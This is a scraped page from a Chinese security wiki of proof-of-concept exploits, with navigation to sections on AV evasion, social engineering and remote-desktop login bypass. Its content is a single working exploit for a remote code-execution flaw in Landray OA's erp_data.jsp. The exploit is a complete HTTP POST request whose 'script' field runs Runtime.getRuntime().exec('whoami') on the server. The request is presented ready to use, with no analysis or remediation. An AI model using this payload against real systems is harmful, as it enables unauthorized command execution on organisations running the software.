fofamini-wiki

2023hw
Awesome-POC
wy876
- POC
免杀技巧
在线工具
安云文库
漏洞库
知识库
社会工程学
远程桌面登录绕过
- 远程桌面登录绕过专题
速查表
靶场Writeup
- 靶场Writeup
index

登录白背景

源码

蓝凌 OA erp_data.jsp 代码执行漏洞

POST /sys/ui/extend/varkind/custom.jsp  HTTP/1.1
Host: test.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 136

var={"body":{"file":"/tic/core/resource/js/erp_data.jsp"}}&erpServcieName=sysFormulaValidate&script=Runtime.getRuntime().exec("whoami");